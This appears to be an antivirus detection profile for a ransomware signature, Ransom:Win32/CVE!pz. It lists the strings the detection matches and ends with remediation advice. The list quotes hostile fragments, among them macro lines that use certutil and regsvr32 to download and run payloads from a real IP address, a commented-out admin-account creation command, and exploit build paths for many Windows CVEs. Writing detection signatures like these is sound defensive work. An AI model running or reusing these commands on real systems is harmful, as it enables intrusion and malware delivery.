Concrete signature match: Ransomware (encrypts files and demands payment) for the 32-bit Windows platform, family CVE
This threat, identified as Ransom:Win32/CVE!pz, is a concrete detection of a ransomware payload delivered through the exploitation of known vulnerabilities, including those related to ActiveX (OWC10.Spreadsheet), Silverlight, and potentially SMB/NTLM. It aims to achieve remote code execution to deploy ransomware, encrypting files for extortion and likely communicating with a command-and-control server.
Relevant strings associated with this threat:
- = new ActiveXObject("OWC10.Spreadsheet"); (PEHSTR_EXT)
- <script src="off.js"></script> (PEHSTR_EXT)
- ++){try{obj.msDataSourceObject( (PEHSTR_EXT)
- .php?ver=%VER%&cver=%CVER%&id=%ID% (PEHSTR_EXT)
- NT LM 0.12 (PEHSTR_EXT)
- \MAILSLOT\LANMANA (PEHSTR_EXT)
- ;N/lc (SNID)
- #\{m*a (SNID)
- .`!Mr1 (SNID)
- 45\u; (SNID)
- +:/GS (SNID)
- {Z}\) (SNID)
- B\Kns, (SNID)
- .gTr~C (SNID)
- 0[qu/ (SNID)
- x.>:# (SNID)
- ZwCVE7 (SNID)
- -jS (SNID)
- "\>+> (SNID)
- vBs (SNID)
- <9\H_ (SNID)
- (b,.W (SNID)
- 5\n|=/ (SNID)
- Fu_I<~wJ\W (SNID)
- {P5.e (SNID)
- <Tq'. (SNID)
- \epathobj_exp\Release\epathobj_exp.pdb (PEHSTR_EXT)
- Exploit ok run command (PEHSTR_EXT)
- No luck, cleaning up. and try again.. (PEHSTR_EXT)
- System.Windows.Browser (PEHSTR_EXT)
- ScriptObject (PEHSTR_EXT)
- :Class="asdgsd.miry" (PEHSTR_EXT)
- x:Class="hsaytvxw17.App" (PEHSTR_EXT)
- hsaytvxw17.g.resources (PEHSTR_EXT)
- \EXP\SilverApp1\SilverApp1\obj\Debug\ (PEHSTR_EXT)
- \EXP\SILVER_Preloader\Preloader\obj\Debug\ (PEHSTR_EXT)
- eae6af6c.g.resources (PEHSTR_EXT)
- k2hfPelkt.g.resources (PEHSTR_EXT)
- x:Class="eae6af6c.MainPage" (PEHSTR_EXT)
- x:Class="k2hfPelkt.MainPage" (PEHSTR_EXT)
- \\.\WMIDataDevice (PEHSTR)
- CVE (PEHSTR_EXT)
- IsError CVErr( (MACROHSTR_EXT)
- "cmd.exe /c P^" + (MACROHSTR_EXT)
- "md.exe /" + Format(ChrW( (MACROHSTR_EXT)
- ^e^l^L^.^E^X^e^ (MACROHSTR_EXT)
- Example: exp.exe "net user admin admin /ad" (PEHSTR_EXT)
- \\.\WMIDataDevice (PEHSTR_EXT)
- \ms16-014\Release\ms16-014.pdb (PEHSTR_EXT)
- exp.exe "net user admin admin /ad (PEHSTR_EXT)
- exp.exe "net user admin admin /tor (PEHSTR_EXT)
- CVE-2018-8120 exploit by @unamer(https://github.com/unamer) (PEHSTR_EXT)
- CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab) (PEHSTR_EXT)
- shell.Run("regsvr32 /u /n /s /i:http://127.0.0.1/payloooad.sct scrobj.dll", 0, False) (MACROHSTR_EXT)
- Call MsgBox("Houston, we've had a problem!" & vbNewLine & "Microsoft Word processing error." (MACROHSTR_EXT)
- /u /n /s /i:http://185.104.114.115/1.sct scrobj.dll", 0, False) (MACROHSTR_EXT)
- .Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe") (MACROHSTR_EXT)
- .Run ("cmd.exe /c cer" + "tutil.exe -url" + "cache -sp" + "lit -f http://185.104.114.115/123.exe sdfsdf.exe && start (MACROHSTR_EXT)
- Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\ro" + "ot\default:" + "StdRegProv") (MACROHSTR_EXT)
- msg = "This application appears to be made not supported format. [Error Code: -229] (MACROHSTR_EXT)
- Dim sheasdll (MACROHSTR_EXT)
- SCROLLBAR (PEHSTR)
- CVE-2018-8120 (PEHSTR_EXT)
- [+] Triggering vulnerability... (PEHSTR_EXT)
- Example: exp.exe (PEHSTR_EXT)
- ms15-051\Win32\ms15-051.pdb (PEHSTR)
- = UserForm2.TextBox2.Tag + "\{ (MACROHSTR_EXT)
- .dll (MACROHSTR_EXT)
- KillArray ZipFolder & "\ (MACROHSTR_EXT)
- .bin", ZipName (MACROHSTR_EXT)
- = UserForm2.TextBox1.Tag & "\ (MACROHSTR_EXT)
- .xlsx" (MACROHSTR_EXT)
- Call VBA.Shell$( (MACROHSTR_EXT)
- COMahawk.pdb (PEHSTR_EXT)
- = ""bin.base64""" & vbCrLf (MACROHSTR_EXT)
- .vbs" (MACROHSTR_EXT)
- s = s + "just_obj.exec RUNC" + vbCrLf (MACROHSTR_EXT)
- strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, ""/"" ) (MACROHSTR_EXT)
- x = x + "\asc.txt" (MACROHSTR_EXT)
- File = File + "vbs" (MACROHSTR_EXT)
- s = s + " Execute( (MACROHSTR_EXT)
- s = s + " path = path + ""\asc.txt (MACROHSTR_EXT)
- .BuildPath( myPath, Mid( myURL, InStrRev( myURL, (MACROHSTR_EXT)
- varstrlong = varstrlong + " path = path + ""\asc.txt (MACROHSTR_EXT)
- 0asc.txt" (MACROHSTR_EXT)
- varstrlong = varstrlong + "Execute(""HTxTPDownload fsdfdsfs, (MACROHSTR_EXT)
- ElseIf objFSO.FolderExists (MACROHSTR_EXT)
- alxmd.Text = bace64 " + vbCrLf (MACROHSTR_EXT)
- Execute(""byteArray = alxmd."" + novarue)" + vbCrLf (MACROHSTR_EXT)
- If (fso.FileExists(path)) Then " + vbCrLf (MACROHSTR_EXT)
- ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, (MACROHSTR_EXT)
- ldjdiu34h43gy43hut34 = ldjdiu34h43gy43hut34 + "Execute(""call grgergre28u38kDecode (MACROHSTR_EXT)
- Execute(""strFile = objFSO."" + ""Build"" + (MACROHSTR_EXT)
- Execute(""fso.DeleteFile(path)"") ' (MACROHSTR_EXT)
- msg = path & "" doesn't exist.""" + vbCrLf (MACROHSTR_EXT)
- Execute(""baax."" + ""Open"") " + vbCrLf (MACROHSTR_EXT)
- path = path + ""\program""" + vbCrLf (MACROHSTR_EXT)
- Application.Eval (bttttttttgggggggg4.Run(Path + TXTFile, yu67fre54kji, waitOnReturn)) (MACROHSTR_EXT)
- cb4ijeur = cb4ijeur + "Execute (MACROHSTR_EXT)
- jeojrvbsl4 = jeojrvbsl4 + "cft6ygvcr4rcvfgyu = "" (MACROHSTR_EXT)
- jeojrvbsl4 = jeojrvbsl4 + (MACROHSTR_EXT)
- & ".pdf" (MACROHSTR_EXT)
- = fso.File"" + ""Exists(path)"")" + vbCrLf '0000 (MACROHSTR_EXT)
- siunwufjsftw2 = siunwufjsftw2 + "cft6ygvcr4rcvfgyu = "" (MACROHSTR_EXT)
- siunwufjsftw2 = siunwufjsftw2 + (MACROHSTR_EXT)
- S3cur3Th1sSh1t/SharpByeBear (PEHSTR_EXT)
- CVE_2019_1405 (PEHSTR_EXT)
- Usage : sysret.exe <option> <argument> (PEHSTR_EXT)
- = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, _ (MACROHSTR_EXT)
- bgfjeryhj57r6uj55jry6jr = bgfjeryhj57r6uj55jry6jr + ""in.""" + vbCrLf (MACROHSTR_EXT)
- 1ZERO.EXE IP DC DOMAIN ADMIN_USERNAME [-c] COMMAND (PEHSTR)
- /powershell.exe -c Reset-ComputerMachinePassword (PEHSTR)
- ZERO.EXE IP DC DOMAIN (PEHSTR)
- \COMMAND - command that will be executed on domain controller. should be surrounded by quotes (PEHSTR)
- \$ UH (PEHSTR_EXT)
- (IP DC DOMAIN ADMIN_USERNAME [-c] COMMAND (PEHSTR)
- c:\ok_0000 (PEHSTR_EXT)
- CVE-2021-31956: Ntfs Heap Vulnerability (PEHSTR_EXT)
- CVE-2021-31956.pdb (PEHSTR_EXT)
- ch3rn0byl.txt (PEHSTR_EXT)
- CVE-2021-1675-LPE.pdb (PEHSTR_EXT)
- ]]></report> (PEHSTR)
- /upd/check.php? (PEHSTR)
- .php?ver=%VER%&cver=%CVER (PEHSTR)
- CVE-2021-31956-EXP-main (PEHSTR_EXT)
- ConvertStringSecurityDescriptorToSecurityDescriptorA (PEHSTR_EXT)
- ConsoleApplication11.pdb (PEHSTR_EXT)
- Failed to execute CVE dll from memory, er (PEHSTR_EXT)
- Failed to upload screenshot, erro (PEHSTR_EXT)
- +"$(iwrhttps://www.mediafire.com/file/jad6397n5fjf3lv/2jnr7000.txt/file-" (MACROHSTR_EXT)
- '.replace(' (MACROHSTR_EXT)
- ProgramData\\1.bat (PEHSTR_EXT)
- Swaping shell. (PEHSTR_EXT)
- CVE-2018-8639-exp-master (PEHSTR_EXT)
- exp.pdb (PEHSTR_EXT)
- Trigger vul. (PEHSTR_EXT)
- pSys/tem Token = (PEHSTR_EXT)
- based on CVE-2019-0708 (PEHSTR_EXT)
- payload_x64.dll (PEHSTR_EXT)
- ipslist.txt (PEHSTR_EXT)
- playbit@exploit.im (PEHSTR_EXT)
- Injecting shellcode in winlogon... (PEHSTR_EXT)
- Sending SMB negotiation request... (PEHSTR_EXT)
- Couldn't leak ktoken of current process... (PEHSTR_EXT)
- C:\Exploit\CVE-2023-28252\x64\Release\clfs_eop.pdb (PEHSTR_EXT)
- NJs (PEHSTR_EXT)
- CVE-2024-30088\x64\Release\poc.pdb (PEHSTR_EXT)
- C:\Users\root\source\repos\CVE-2024-30088 (PEHSTR_EXT)
- Release\poc.pdb (PEHSTR_EXT)
- CVE-2024-26229_orig\x64\Release\CVE-2024-26229_orig.pdb (PEHSTR_EXT)
- RemoteKrbRelay.Relay.Attacks.Http (PEHSTR_EXT)
- RemoteKrbRelay.Clients.Attacks (PEHSTR_EXT)
- Exploit\RemoteKrbRelay (PEHSTR_EXT)
- \x64\Release\CVE-20 (PEHSTR_EXT)
- CVE-2023-36802 (PEHSTR_EXT)
- \CVE-2024-30088-main\ (PEHSTR_EXT)
- C:\Windows\system32\cmd.exe (PEHSTR_EXT)
- X[YZ^_]\AXAYAZA[A\A]A^A_H (PEHSTR_EXT)
- \x64\Release\ (PEHSTR_EXT)
- 2CVE-2023- (PEHSTR_EXT)
- .exe <pid> (PEHSTR_EXT)
- 64\Release\EfsPotato.pdb (PEHSTR_EXT)
- \pipe\srvsvc (PEHSTR_EXT)
- \Device\Mup\;Csc\.\. (PEHSTR_EXT)
- cmd.exe (PEHSTR_EXT)
- CVE-2024 (PEHSTR_EXT)
- \Device\Afd\Endpoint (PEHSTR_EXT)
- \pipe\LOCAL\im (PEHSTR_EXT)
- \pipe\LOCAL\rw (PEHSTR_EXT)
- \CVE-2024- (PEHSTR_EXT)
- \x64\Release\CVE-2024- (PEHSTR_EXT)
- CVE-2024-49138-POC.pdb (PEHSTR_EXT)
- source\repos\CVE-2024-20656\Expl\x64\Release (PEHSTR_EXT)
- exploit.zip (PEHSTR_EXT)
- \shared (PEHSTR_EXT)
- [*] Executing shellcode (PEHSTR_EXT)
- [*] Exploit complete. Check for SYSTEM privileges (PEHSTR_EXT)
- [*] cmd.exe PID: (PEHSTR_EXT)
- \inf\ip (PEHSTR_EXT)
- \liprip.dll (PEHSTR_EXT)
- \fsutk.dll (PEHSTR_EXT)
- %SystemRoot%\System32\svchost.exe -k netsvcs (PEHSTR_EXT)
- NIPRP.DLL (PEHSTR_EXT)
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DC888631-57F5-4AF4-86B3-BDE5F854DCBF}\ (PEHSTR_EXT)
- Classes\CLSID\{0E5CBF21-D15F-11d0-8301-00AA005B4383}\InProcServer32\ (PEHSTR_EXT)
- WS\inf\optkec.inf (PEHSTR_EXT)
- http://www.baidu.com/s?wd= (PEHSTR_EXT)
- http://www.google.cn/search?hl=zh-CN&q= (PEHSTR_EXT)
- http://search.cn.yahoo.com/search?p= (PEHSTR_EXT)
- http://www.sogou.com/web?sogouhome=&shuru=shou&query= (PEHSTR_EXT)
- http://so.163.com/search.php?q= (PEHSTR_EXT)
- \Help\ (PEHSTR_EXT)
- CVER%# (PEHSTR_EXT)
- http://dw.mtsou.com/ (PEHSTR_EXT)
- \jbk.rar (FILEPATH)
- \kentgo.log (FILEPATH)
- \inf\iplbk.inf (FILEPATH)
- \help\fkhfu.chi (FILEPATH)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Immediately isolate the infected system. Perform a comprehensive malware scan with updated antivirus definitions. Prioritize patching all operating systems, web browsers, and applications (especially Microsoft Office, Silverlight, and network services) to address the exploited vulnerabilities. Restore compromised data from clean, verified backups and investigate the initial access vector to prevent future attacks.